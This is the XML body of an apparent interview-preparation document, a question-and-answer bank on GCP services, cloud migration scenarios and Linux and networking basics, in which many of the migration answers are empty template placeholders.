        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Standard Gke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Q792. Explain node pools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Node pools are groups of GKE nodes with shared configuration such as machine type, labels, taints, autoscaling, and upgrades. They allow workload separation and specialized hardware such as GPUs.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Node Pools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Q793. What is private GKE cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A private GKE cluster has nodes without public IP addresses and can restrict control plane access. It improves security for production workloads when combined with private networking and controlled administration paths.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Private Gke Cluster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Q794. Explain Workload Identity Federation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Workload Identity Federation allows external workloads to access GCP resources without long-lived service account keys. It exchanges trusted external identity tokens for short-lived Google credentials.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Workload Identity Federation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Q795. What is cloud shell?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Shell is a browser-based command-line environment for managing GCP. It includes common tools such as gcloud, kubectl, terraform, and an authenticated environment.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Shell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Q796. Explain Infrastructure Manager.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Infrastructure Manager is GCP’s managed Terraform-based service for deploying and managing infrastructure as code. It supports deployments, state management, and policy-oriented operations.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Infrastructure Manager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Q797. What is Artifact Analysis?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Artifact Analysis stores metadata and vulnerability information for artifacts such as container images. It supports vulnerability scanning, SBOM-related metadata, and Binary Authorization workflows.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Artifact Analysis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Q798. Explain vulnerability scanning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Vulnerability scanning checks systems, images, dependencies, and artifacts for known security issues. In cloud environments it should be continuous, prioritized by severity and exploitability, and tied to remediation workflows.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Vulnerability Scanning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Q799. What is organization policy service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Organization Policy Service enforces constraints on GCP resources across organizations, folders, and projects. It helps prevent risky configurations such as public access, unsupported regions, or weak security settings.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Organization Policy Service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Q800. Explain quota exhaustion scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Quota exhaustion happens when a project or service hits limits such as CPUs, IPs, API requests, disks, GPUs, or load balancers. Prevention includes monitoring quotas, forecasting growth, requesting increases early, and using multi-region designs.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Quota Exhaustion Scenarios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Q801. What are common GCP outages?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common GCP outage scenarios include zonal failures, quota exhaustion, IAM misconfiguration, DNS issues, expired certificates, load balancer backend failures, network misrouting, and regional service disruptions.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Common GCP Outages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Q802. Explain multi-region deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Multi-region deployment provisions resources across multiple regions for resilience, latency, or compliance. IaC should standardize regional modules while handling failover and data replication needs.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Multi-region Deployment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Q803. What is cloud resilience?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is cloud resilience refers to an important GCP/cloud engineering concept. In an interview, explain what it does, where it fits in the architecture, how it is secured and monitored, and what tradeoffs affect cost, scalability, and reliability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Resilience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Q804. Explain enterprise landing zone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An enterprise landing zone is a secure foundation for cloud adoption. It includes organization structure, projects, IAM, networking, logging, security baselines, policies, billing, and deployment automation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Enterprise Landing Zone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Q805. What are common GCP interview scenarios?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common GCP interview scenarios include designing GKE platforms, troubleshooting networking, securing IAM, optimizing cost, building DR, using Cloud Build, managing quotas, and designing data or ML pipelines on Vertex AI.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Common GCP Interview Scenarios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Q806. Design a secure scalable GCP platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A secure scalable GCP platform should start with an enterprise landing zone, Shared VPC, private networking, least-privilege IAM, logging, SCC, organization policies, and CI/CD with policy checks. Workloads can run on GKE, Cloud Run, or managed services with autoscaling, multi-zone resilience, monitored SLOs, backup/DR, cost controls, and GitOps/IaC governance.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Secure Scalable GCP Platform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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Cloud Migration Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q807. 6 Rs framework: How would you decide between rehost, replatform, refactor, repurchase, retire, and retain when migrating an application portfolio to the cloud?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud Migration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6 Rs framework: How would you decide between rehost, replatform, refactor, repurchase, retire, and retain when migrating an application portfolio to the cloud?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q808. Migration wave planning: How would you sequence a large-scale migration across dozens of interdependent applications - which move first, which move last, and why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud Migration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Migration wave planning: How would you sequence a large-scale migration across dozens of interdependent applications - which move first, which move last, and why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q809. Data migration validation: How would you validate that migrated data is complete and correct (e.g. using Database Migration Service or Storage Transfer Service) before cutover?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud Migration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Data migration validation: How would you validate that migrated data is complete and correct (e.g. using Database Migration Service or Storage Transfer Service) before cutover?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q810. Cutover and rollback: How would you plan the cutover window and rollback plan for a business-critical application migrating from on-prem or another cloud to GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud Migration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Cutover and rollback: How would you plan the cutover window and rollback plan for a business-critical application migrating from on-prem or another cloud to GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q811. Cost and TCO estimation: How would you estimate and validate cost savings before and after a cloud migration, and what commonly gets underestimated?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud Migration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Cost and TCO estimation: How would you estimate and validate cost savings before and after a cloud migration, and what commonly gets underestimated?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q812. Migrate for Compute Engine: When would you use Migrate for Compute Engine (lift-and-shift VM migration) versus rebuilding on managed services like GKE or Cloud Run?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud Migration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Migrate for Compute Engine: When would you use Migrate for Compute Engine (lift-and-shift VM migration) versus rebuilding on managed services like GKE or Cloud Run?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q813. Hybrid connectivity during migration: How would you design network connectivity and identity so an application can run split across on-prem and cloud during a phased migration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud Migration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Hybrid connectivity during migration: How would you design network connectivity and identity so an application can run split across on-prem and cloud during a phased migration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q814. Scenario: Post-migration, a newly migrated GCP workload shows 30% higher latency than it did on its previous platform. How would you diagnose whether the cause is network, compute sizing, storage IOPS, or application configuration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud Migration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Scenario: Post-migration, a newly migrated GCP workload shows 30% higher latency than it did on its previous platform. How would you diagnose whether the cause is network, compute sizing, storage IOPS, or application configuration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q815. Scenario: A client wants to migrate a production workload from GCP to AWS. Walk through your approach - service equivalency mapping (GKE to EKS, Cloud SQL to RDS, Cloud Storage to S3, IAM to IAM), data transfer, DNS cutover, and rollback plan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud Migration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Scenario: A client wants to migrate a production workload from GCP to AWS. Walk through your approach - service equivalency mapping (GKE to EKS, Cloud SQL to RDS, Cloud Storage to S3, IAM to IAM), data transfer, DNS cutover, and rollback plan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q816. Scenario: A client wants to migrate a production workload from AWS to GCP. Walk through your approach - service equivalency mapping (EKS to GKE, RDS to Cloud SQL, S3 to Cloud Storage, IAM to IAM), data transfer tooling, DNS cutover, and rollback plan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud Migration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Scenario: A client wants to migrate a production workload from AWS to GCP. Walk through your approach - service equivalency mapping (EKS to GKE, RDS to Cloud SQL, S3 to Cloud Storage, IAM to IAM), data transfer tooling, DNS cutover, and rollback plan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q817. Scenario: A client wants to migrate a workload from Azure to GCP. What would you map AKS, Azure SQL, Blob Storage, and Azure AD to on GCP, and what would you watch for in networking (VNet to VPC) and identity federation during the migration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud Migration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Scenario: A client wants to migrate a workload from Azure to GCP. What would you map AKS, Azure SQL, Blob Storage, and Azure AD to on GCP, and what would you watch for in networking (VNet to VPC) and identity federation during the migration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q818. Scenario: A client wants to migrate a workload from Azure to AWS. What would you map AKS, Azure SQL, Blob Storage, and Azure AD to on AWS, and what would you watch for in networking (VNet to VPC) and identity federation during the migration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud Migration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Scenario: A client wants to migrate a workload from Azure to AWS. What would you map AKS, Azure SQL, Blob Storage, and Azure AD to on AWS, and what would you watch for in networking (VNet to VPC) and identity federation during the migration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Linux, Networking &amp; Security (651–760)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q819. What is Linux kernel?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The Linux kernel is the core of the operating system that manages CPU, memory, devices, filesystems, processes, and networking. Applications interact with it through system calls while distributions add user-space tools around it.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Linux Kernel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Q820. Explain process management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Process management is how Linux creates, schedules, monitors, signals, and terminates processes. Common tools include ps, top, htop, kill, nice, systemctl, and journalctl.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Process Management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Q821. What is systemd?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: systemd is the service and init manager used by many Linux distributions. It starts services, manages dependencies, tracks process state, handles logs with journald, and supports timers, sockets, and targets.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Systemd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Q822. Explain journald.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: journald is systemd’s logging service. It collects structured logs from services, the kernel, and boot events, and administrators inspect them using journalctl.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Journald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Q823. What is cron?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: cron is a Linux scheduler for running commands at fixed times or intervals. It is commonly used for backups, cleanup jobs, health checks, and periodic automation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cron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Q824. Explain file permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Linux file permissions control read, write, and execute access for the owner, group, and others. They are managed with chmod, chown, groups, ACLs, and umask.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>File Permissions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Q825. What is chmod?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: chmod changes file or directory permission bits in Linux. It can use symbolic modes like u+x or numeric modes like 755.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Chmod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Q826. Explain chown.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: chown changes the owner and optionally the group of files or directories. It is commonly used to fix service permissions and application runtime access.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Chown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Q827. What is sudo?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: sudo allows permitted users to execute commands with elevated privileges, usually as root. It should be controlled with least privilege and audited carefully.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Sudo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Q828. Explain SSH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: SSH is a secure protocol for remote login and command execution over encrypted connections. It supports key-based authentication, port forwarding, bastion access, and secure automation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>SSH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Q829. What is SCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: SCP copies files securely over SSH. It is simple for one-off transfers, though rsync or SFTP are often preferred for advanced or resumable transfers.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Scp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Q830. Explain rsync.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: rsync synchronizes files efficiently by copying only changed data. It is useful for backups, deployments, and large directory transfers over SSH.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Rsync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Q831. Explain TCP/IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: TCP/IP is the protocol suite that powers most network communication. IP handles addressing and routing, while TCP provides reliable ordered delivery between hosts.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Tcp/ip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Q832. What is HTTP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: HTTP is an application-layer protocol used by web clients and servers to exchange requests and responses. It defines methods such as GET, POST, PUT, PATCH, and DELETE.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>HTTP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Q833. Explain HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: HTTPS is HTTP over TLS encryption. It protects confidentiality, integrity, and server identity for web traffic.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>HTTPS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Q834. What is TLS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
